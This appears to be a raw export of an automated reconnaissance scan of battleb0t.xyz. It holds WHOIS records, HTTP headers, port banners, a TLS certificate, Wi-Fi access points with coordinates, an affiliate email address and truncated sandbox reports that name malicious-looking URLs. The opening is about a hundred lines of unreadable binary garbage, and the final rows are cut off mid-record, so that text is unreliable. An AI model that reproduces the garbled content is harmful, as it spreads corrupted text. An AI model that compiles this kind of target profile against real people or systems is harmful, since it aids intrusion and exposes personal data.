QPO0QE
P_0QK
2 ?w'
yrW'<
Au$rV7:
eirlI
GZrGQ
?wXRx
iVv5:
DrTty
eIAv$
QsRz<
rVw6J
G$uCU
yJrGU$
kweG$
vGCDoU
rI$wwq
MQIIL
u<rT4
P"ZO2
lkGRy
O<rGi
>:e>:9L
Uy?wF
<rOk$
WrXjPA
eii:<
rTr_i
EST4U
O1Pfg
kG$u<
QEKA!E
QQ-IJ66
2MJ9'
DrTtP
i$un<
4y 2>>
ZIc$q
wRk2G'
drUE\
AuXPOS
DtQA<
iu$pO
RJzQ$tP_1-
DtQAAE
-Q$U-
fO0QE
Cwkww
WS/xw
"J_2H
\rU -d
i7PZG
XZi>e
rT7qX
O2M:O
:eADT
_1-EE
j/"J_
T5/ x
\ebnT
v2Acu
0IZpI
?>?2J
wU-rV
tyubH
-.Kx<
2I<rZ
g\u2ld
EEKE_1<
6g$cy
\uBI?wPO<
GDub:<
"?.?>8
E6Ju!
tIIA1
IRytyq
_Gwq<
rm6?" | https://pics.battleb0t.xyz/images/nomnom.jpg |
| 2023-05-12 02:58:35 | Phone Number | No | Phone Number Extractor | 0 | 0 | 2 | 0 | None | +14806242598 | Domain Name: AYHU.XYZ
Registry Domain ID: D338262912-CNIC
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com/
Updated Date: 2023-01-27T12:12:18.0Z
Creation Date: 2022-12-13T18:01:25.0Z
Registry Expiry Date: 2023-12-13T23:59:59.0Z
Registrar: Go Daddy, LLC
Registrar IANA ID: 146
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registrant Organization: Domains By Proxy, LLC
Registrant State/Province: Arizona
Registrant Country: US
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: BRETT.NS.CLOUDFLARE.COM
Name Server: LEANNA.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4805058800
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:44:06.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: ayhu.xyz
Registry Domain ID: D338262912-CNIC
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com
Updated Date: 2022-12-13T18:01:26Z
Creation Date: 2022-12-13T18:01:25Z
Registrar Registration Expiration Date: 2023-12-13T23:59:59Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registry Registrant ID: CR599348184
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 2155 E Warner Rd
Registrant City: Tempe
Registrant State/Province: Arizona
Registrant Postal Code: 85284
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Registry Admin ID: CR599348186
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 2155 E Warner Rd
Admin City: Tempe
Admin State/Province: Arizona
Admin Postal Code: 85284
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Registry Tech ID: CR599348185
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 2155 E Warner Rd
Tech City: Tempe
Tech State/Province: Arizona
Tech Postal Code: 85284
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Name Server: BRETT.NS.CLOUDFLARE.COM
Name Server: LEANNA.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T02:44:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
TERMS OF USE: The data contained in this registrar's Whois database, while believed by the
registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its
accuracy. This information is provided for the sole purpose of assisting you in obtaining
information about domain name registration records. Any use of this data for any other purpose
is expressly forbidden without the prior written permission of this registrar. By submitting
an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not
to use this data to allow, enable, or otherwise support the dissemination or collection of this
data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone,
postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations
of any kind, including spam. You further agree not to use this data to enable high volume, automated
or robotic electronic processes designed to collect or compile this data for any purpose, including
mining this data for your own personal or commercial purposes. Failure to comply with these terms
may result in termination of access to the Whois database. These terms may be subject to modification
at any time without notice.
|
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | cf-cache-status: MISS | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "MISS", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "etag": "W/\"8c335e8962efa39b56919d96c0b5527b\"", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=sZlRfK%2B18hvKHsoLJ40BkYB4lHX60aBHph6G1vTBEuSHhMJnpf00BL3raGeVno%2B26HQG4%2BW6ctKHKalYOpr00wtWKpk2uf4%2BwHegHXg02iluCPfF38%2B%2FPJX8%2B4PjVD4UW5HjHU9e\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=14400, must-revalidate", "date": "Fri, 12 May 2023 02:54:19 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "application/javascript", "cf-ray": "7c5f605affff189d-EWR"} |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Officewirelessnew (Net ID: 00:13:10:7F:DA:06) | 32.8608, -79.9746 |
| 2023-05-12 03:03:51 | Co-Hosted Site | No | ThreatMiner | 0 | 0 | 2 | 0 | None | james-gamboa.github.io | 185.199.110.153 |
| 2023-05-12 02:44:31 | IPv6 Address | No | DNS Resolver | 0 | 0 | 3 | 0 | None | 2606:4700:3037::6815:470e | vscode.battleb0t.xyz |
| 2023-05-12 02:44:28 | IP Address | No | DNS Resolver | 74 | 0 | 2 | 0 | None | 35.229.48.116 | pics.battleb0t.xyz |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 2 | 0 | 3 | 0 | None | https://funny.battleb0t.xyz/images/reveloder.jpg | https://funny.battleb0t.xyz/ |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | HOGWARTSSOWAW (Net ID: D4:B2:7A:F3:1A:42) | 37.751, -97.822 |
| 2023-05-12 02:55:15 | Operating System | No | Censys | 0 | 0 | 3 | 0 | None | Ubuntu Linux | 165.232.113.85 |
| 2023-05-12 02:55:21 | Open TCP Port Banner | No | Censys | 0 | 0 | 3 | 0 | None | HTTP/1.1 404 Not Found
Content-Length: 46
Content-Type: application/json; charset=UTF-8
Date: <REDACTED>
Server: Caddy
Vary: Origin
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 1; mode=block
| 207.154.228.169 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:61:24:2C) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:54:20 | HTTP Headers | No | Censys | 0 | 0 | 4 | 0 | None | {"Content_Length": ["0"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Nf_Request_Id": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "Server": ["Netlify"], "X_Nf_Request_Id": ["01H04BK0BS0X0MXB72Y8AY7JTF"], "Date": ["<REDACTED>"]} | 2600:1f18:2489:8200::c8 |
| 2023-05-12 03:23:11 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.1:443 | 188.114.96.0/24 |
| 2023-05-12 02:44:05 | SSL Certificate - Raw Data | No | CertSpotter | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:88:80:c3:9c:e1:f5:05:d4:ce:eb:a7:b8:8b:96:69:16:e7
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 27 13:22:33 2023 GMT
Not After : Jun 25 13:22:32 2023 GMT
Subject: CN=kekw.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:bd:d7:3e:a0:44:3f:74:66:1e:5f:b3:2a:36:ad:
5d:f6:03:6b:7c:a2:a0:47:3a:fb:01:98:b1:8f:cc:
c2:91:5e:2e:be:9e:37:09:fc:a3:ca:c0:ce:59:08:
31:20:c4:42:4f:e2:31:60:c4:be:0d:a3:d0:7e:5f:
84:84:43:02:3b:79:0a:56:99:86:35:5f:ee:ec:21:
8b:06:16:ef:3b:0d:ec:b0:a6:01:ca:7c:9f:ae:0e:
21:80:e7:f6:f2:e9:02:7d:5d:df:7d:70:dd:dd:93:
90:c2:a3:7e:80:f6:ad:ed:f9:15:f2:c4:37:d6:ad:
4b:89:76:da:d5:eb:7c:ff:f8:44:95:84:d6:c3:19:
7b:70:37:49:42:e5:fe:7d:2c:bd:de:bc:2b:99:c0:
a4:9b:15:4f:d7:2f:f2:c7:b5:99:6b:e4:41:8f:a5:
3f:0f:85:1f:6c:4e:91:90:da:48:18:85:c0:a8:f9:
5b:43:e7:ba:4b:5b:17:69:9f:6a:26:1d:48:87:97:
a5:b7:a2:63:4f:58:3b:87:61:7a:53:e1:17:71:98:
3f:e6:14:b4:56:34:1d:a0:89:72:33:eb:2c:c5:36:
a0:27:b1:d2:f8:c6:e3:8f:79:67:b5:d6:8a:ec:f1:
bd:9b:ad:69:c1:3b:50:1a:84:e7:cb:cf:d0:71:43:
d2:3b:49:a5:27:2e:d1:3d:b9:18:82:02:4d:8f:b0:
bb:df:42:cf:64:aa:67:dc:2f:01:5a:31:2e:da:fb:
b2:d7:58:03:8e:aa:3f:4c:ca:46:eb:1f:d0:ce:c6:
8c:fe:3d:b8:0f:99:bb:cf:51:78:2e:f4:7a:df:b5:
ee:fc:f9:a7:d1:b7:2b:1b:c6:17:72:43:c6:34:57:
a1:d1:1d:f1:0c:8c:8a:f9:1d:27:7f:56:dc:e1:0f:
9b:fe:d2:eb:01:b7:80:25:0c:68:e6:38:d2:70:20:
00:db:75:51:f4:50:11:95:65:85:63:dc:a6:18:f5:
d8:1d:55:65:7b:fd:4b:42:c9:e0:e0:5b:99:47:62:
96:1e:29:13:2d:13:79:08:f1:19:4e:83:44:d1:b3:
1e:52:55:c8:85:91:ec:6f:74:02:73:b9:35:b5:4d:
32:70:2b:a5:40:65:f3:30:c9:2a:75:4a:fc:26:5e:
25:6b:0f:f0:6e:21:a9:a3:b3:fc:a9:24:00:c1:d2:
4b:2c:3d:0a:55:12:77:ec:d9:f9:b2:f1:bc:2c:ec:
53:cb:52:84:47:80:24:42:33:90:05:e1:7c:3a:b2:
37:ee:d5:9d:71:10:25:16:47:45:30:42:37:7d:df:
2f:44:a5:75:17:fd:0c:59:0a:14:5f:4a:c6:9e:57:
1c:e4:cb
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
EE:9A:7C:45:9F:8D:28:F8:82:DE:AE:58:A9:48:6F:F4:DA:ED:01:D8
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:kekw.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Mar 27 14:22:33.221 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:4F:44:FF:23:78:0C:0A:43:E7:DD:21:00:
C4:D1:3F:C3:F1:0D:AC:F3:42:E5:53:7F:E9:12:DC:C9:
41:E7:31:AA:02:20:29:7B:10:84:21:42:A6:BE:66:D5:
B5:62:0E:26:B3:36:1B:B2:1F:F3:F6:F2:FA:99:68:0E:
07:72:EE:35:ED:D1
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Mar 27 14:22:33.315 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:42:E7:DB:8E:AD:39:D9:72:0F:22:03:49:
17:50:EA:AF:42:B9:A0:A7:C7:8A:2E:5E:9D:4B:70:15:
12:36:C9:8C:02:20:70:3E:22:0D:CB:C1:8E:23:7B:D4:
20:A7:55:2C:92:70:7B:00:76:E5:77:1A:32:2B:D4:BB:
A7:E5:BA:F4:CD:50
Signature Algorithm: sha256WithRSAEncryption
57:fc:9c:cc:34:05:33:b1:85:6f:05:be:91:2e:7e:dc:3a:5c:
d5:70:d3:bc:68:4c:e5:a6:0e:93:49:4c:b2:24:ea:22:6c:53:
1d:7b:22:13:3e:ae:d1:e9:17:1e:71:5b:5a:e3:c7:59:55:db:
f6:e5:0f:f7:75:49:45:9c:0b:d7:10:90:aa:9f:57:81:e1:bd:
95:72:69:1a:6a:68:d7:6f:63:d3:d0:c5:74:e1:f6:05:01:8e:
de:8a:f2:cc:6b:66:ed:6a:cf:b9:08:1c:41:e7:01:36:39:29:
3c:ce:b9:d5:71:4f:4a:e1:92:00:38:14:85:83:1b:78:d3:52:
4d:9c:dc:62:c1:ff:3e:c9:3b:f4:1b:55:62:89:22:10:52:f5:
2f:09:06:3f:72:98:2a:6c:4f:3e:41:69:f0:90:3d:75:67:0f:
5f:95:04:35:0b:5e:5e:d4:29:7e:f0:df:9c:7f:86:0a:bf:f4:
66:2a:ad:8c:e5:22:e0:2d:ff:f7:04:45:a4:bb:31:8c:99:a5:
16:da:1d:eb:c6:c4:fa:e4:70:84:9c:c6:93:f8:76:5a:3a:48:
95:d4:c6:4d:4c:36:eb:b7:e5:52:69:e6:7d:0f:b5:d1:ab:44:
b8:82:08:6c:6a:ef:3e:4f:de:99:6f:c7:4e:1e:39:17:26:6f:
a6:80:e5:c2
| battleb0t.xyz |
| 2023-05-12 03:00:33 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | pelorriaga@insumetperu.com | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 4, u'threat_score': None, u'compromised_hosts': [u'104.196.30.220', u'172.67.128.152'], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://regclickonetwoget.com/?qs=SVI3JJKW8KWM1XICHGSM-41fb87317e87a7486e', u'signatures': [{u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-101', u'name': u'Found API related strings', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"MaxConnectionsPerServer" (Indicator: "MaxConnectionsPerServer") in Source: 00000000-00002536-00000BCA-24571201\n "MaxConnectionsPer1_0Server" (Indicator: "MaxConnectionsPer1_0Server") in Source: 00000000-00002536-00000BCA-24572342'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-2', u'name': u'An application crash occurred', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 0, u'threat_level': 0, u'type': 9, u'description': u'Report process "WerFault.exe" was created by "rundll32.exe"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-25', u'name': u'Spawns new processes', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Spawned process "WerFault.exe" with commandline "-u -p 3360 -s 132" (UID: 00000000-00003436)'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', 
u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"e1.o.lencr.org"\n "facesupdates.com"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-67', u'name': u'Process launched with changed environment', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 9, u'description': u'Process "WerFault.exe" (UID: 00000000-00003436) was launched with missing environment variables: "PATH"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarFF57.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_9e8_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "DBWinMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "UpdatingNewTabPageData"\n "IsoScope_9e8_IESQMMUTEX_0_303"\n "IsoScope_9e8_IESQMMUTEX_0_519"\n "IsoScope_9e8_IE_EarlyTabStart_0xd54_Mutex"\n "IsoScope_9e8_IESQMMUTEX_0_331"\n "IsoScope_9e8_ConnHashTable<2536>_HashTable_Mutex"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2536"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n 
"Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.196.30.220:443"\n "172.67.128.152:443"\n "23.32.45.191:80"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-103', u'name': u'Spawns new processes that are not known child processes', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Spawned process "WerFault.exe" with commandline "-u -p 3360 -s 132" (UID: 00000000-00003436)'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"CabFF56.tmp" has type "Microsoft Cabinet archive data 61712 bytes 1 file"\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 61712 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 
00000000-00000812]\n "CLXG2BM2.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\CLXG2BM2.txt]- [targetUID: 00000000-00002536]\n "CabFF56.tmp" has type "Microsoft Cabinet archive data 61712 bytes 1 file"- Location: [%TEMP%\\CabFF56.tmp]- [targetUID: 00000000-00000812]\n "BBB0B9C986171FE6F65C60CFDD8B124F" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\BBB0B9C986171FE6F65C60CFDD8B124F]- [targetUID: 00000000-00000812]\n "~DF71962694B43492EC.TMP" has type "data"- Location: [%TEMP%\\~DF71962694B43492EC.TMP]- [targetUID: 00000000-00002536]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00002536]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00002536]\n "BE2B512E0EA306BAD5DC86CC33D62C85" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\BE2B512E0EA306BAD5DC86CC33D62C85]- [targetUID: 00000000-00000812]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00000812]\n "93BCFOQ7.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\93BCFOQ7.txt]- [targetUID: 00000000-00002536]\n "90MZUOV9.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\90MZUOV9.txt]- [targetUID: 00000000-00002536]\n "1B1495DD322A24490E2BF2FAABAE1C61" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\1B1495DD322A24490E2BF2FAABAE1C61]- [targetUID: 
00000000-00000812]\n "6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63]- [targetUID: 00000000-00002536]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002536]\n "9MS61IBX.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\9MS61IBX.txt]- [targetUID: 00000000-00002536]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 61712 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00000812]\n "103621DE9CD5414CC2538780B4B75751" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\103621DE9CD5414CC2538780B4B75751]- [targetUID: 00000000-00000812]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://regclickonetwoget.com/?qs=SVI3JJKW8KWM1XICHGSM-41fb87317e87a7486e"- [Source: Input]\n Pattern match: "https://regclickonetwoget.com"- [Source: Input]\n Heuristic match: "e1.o.lencr.org"- [Source: PCAP]\n Heuristic match: "GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBTvkAFw3ViPKmUeIVEf3NC7b1ErqwQUWvPtK%2Fw2wjd5uVIw6lRvz1XLLqwCEgQibVTQK8A8W0dT8xq4Fb0ooQ%3D%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: e1.o.lencr.org"- [Source: PCAP]\n Heuristic match: "facesupdates.com"- [Source: PCAP]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Found decrypted SSL traffic', u'attck_id_wiki': 
u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /Tracede/animate.min.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://regclickonetwoget.com/?qs=SVI3JJKW8KWM1XICHGSM-41fb87317e87a7486e\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:1 |
| 2023-05-12 02:46:16 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://bcpzonasegurabeta.viabcp.com', u'type': u'extracted', u'verdict': u'malicious'}]}, u'total_processes': 18, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://kutumin.github.io/OSCP-notes/1.html', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:2100:120:WilError_01"\n "Local\\SM0:5488:120:WilError_01"\n "SM0:5488:304:WilStaging_02"\n "InternetShortcutMutex"\n "Local\\SM0:5488:304:WilStaging_02"\n "SM0:5488:120:WilError_01"\n "Local\\SM0:2100:304:WilStaging_02"\n "SM0:2100:120:WilError_01"\n "Local\\SM0:2100:120:WilError_01"\n "ChromeProcessSingletonStartup!"\n "SM0:2100:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:2100:120:WilError_01"\n 